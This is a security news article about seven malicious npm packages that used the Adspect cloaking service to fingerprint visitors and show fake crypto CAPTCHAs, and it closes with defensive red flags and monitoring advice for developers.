According to Infosecurity Magazine, security researchers just uncovered a sophisticated npm malware campaign using seven malicious packages operated by threat actor dino_reborn. The Socket Threat Research Team found six packages containing nearly identical 39 KB malware samples while a seventh built fake webpages. All packages automatically executed through IIFE functions, collecting thirteen detailed device fingerprinting data points and sending them to Adspect API for analysis. The malware displayed fake crypto CAPTCHAs branded with standx.com, jup.ag or uniswap.org to victims while showing blank pages to researchers. All seven packages remained active until recent takedown requests placed them into security holding.
How the scam works
Here’s the clever part – this isn’t your average malware. The packages use Adspect, which is basically a traffic filtering service that’s been weaponized. When someone loads one of these infected packages, it immediately fingerprints your device – everything from your browser to language settings. That data gets sent to Adspect’s API, which makes a split-second decision: are you a real potential victim or a security researcher?
If you look like a researcher? You get a blank white page. Nothing to see here. But if you look like a regular user? Boom – fake CAPTCHA that redirects you to whatever malicious URL Adspect decides to serve up. And since Adspect provides fresh redirect URLs each time, the payloads can change constantly. Pretty slick evasion technique, honestly.
Red flags for developers
So what should developers and security teams be watching for? The researchers highlighted some immediate red flags. Any script that disables user interactions – like blocking right-click, F12, or Ctrl+U – should raise alarms. Same goes for code that posts detailed client fingerprints to unfamiliar PHP endpoints. And network defenders should specifically monitor for /adspect-proxy.php and /adspect-file.php paths across domains.
Look, this campaign is particularly concerning because it blends open source distribution with techniques we usually see in malvertising. The attacker even built in fallback code that reconstructs branded pages if the network fails. This isn’t some amateur operation – it’s sophisticated enough to worry about.
Broader implications
What’s really interesting here is how this reflects the evolving threat landscape. Attackers are getting smarter about using legitimate infrastructure for malicious purposes. Adspect is a real service – it’s just being abused. And targeting npm packages? That’s hitting developers right in their workflow.
For enterprises, this means dependency scanning and software composition analysis just became even more critical. Can you afford to have malicious code slipping into your builds because someone installed what looked like a legitimate package? I don’t think so. The researchers warned we should expect more of these Adspect-style cloaking attacks with new brand facades and package names. Basically, this isn’t going away – it’s just the beginning of a new attack pattern.
Staying protected
So what can you do? First, treat any unexpected scripts that disable user interactions as immediate red flags. Monitor your network for those Adspect proxy paths. And maybe most importantly – assume that open source packages can be compromised. Use tools like Socket’s research to stay informed about emerging threats.
The scary truth is that as development workflows become more automated, attackers are finding clever ways to inject themselves into the supply chain. This npm campaign shows they’re getting better at it. Stay vigilant out there.
